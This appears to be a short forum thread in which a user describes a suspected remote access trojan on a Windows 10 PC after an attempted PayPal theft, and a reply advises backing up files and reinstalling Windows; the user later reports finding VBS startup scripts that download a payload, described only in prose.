Your Windows 10 system is compromised with a malicious backdoor. What should you do next?
Your Windows 10 system is compromised with a malicious backdoor. What should you do next?
The situation involves a potential RAT on your PC. I noticed suspicious activity after someone attempted to drain my PayPal account, which I managed to stop just in time. The machine is located right beside me and isn't connected to any network. I plan to wipe it off, though I'm unsure what the attacker did beforehand. There seems to be no active investigation yet—defender logs are corrupted, and updates appear delayed, suggesting this might not have happened recently. Good news: the PC is seldom used (last usage was over two weeks ago) and it's relatively new, so I’m not sure how to proceed. Any advice or tips would be appreciated. Edit: Further checks revealed two dump files—one dated the 17th of this month and another today. They mostly contain random data but include readable entries like names of my Ethernet adapters.
I assumed there was a rodent in your computer just from the title. Or perhaps you mean the mouse next to your PC. Bad jokes aside, back up all your crucial files. After backup, consider investigating further to find the remote access tool or you might want to erase the hard drive and reinstall Windows.
I hope it was just a genuine rat. Luckily the pc has nothing crucial on it, so I’ll go ahead and destroy it. I ended up discovering some VBS scripts that run at startup and either fetch an image or an MP3 from a questionable site, but that’s where the investigation stops. I won’t download or examine what it’s trying to download, but I have to admit, the script seems fairly simple. Still, it just drops a payload, and I don’t know what it contains.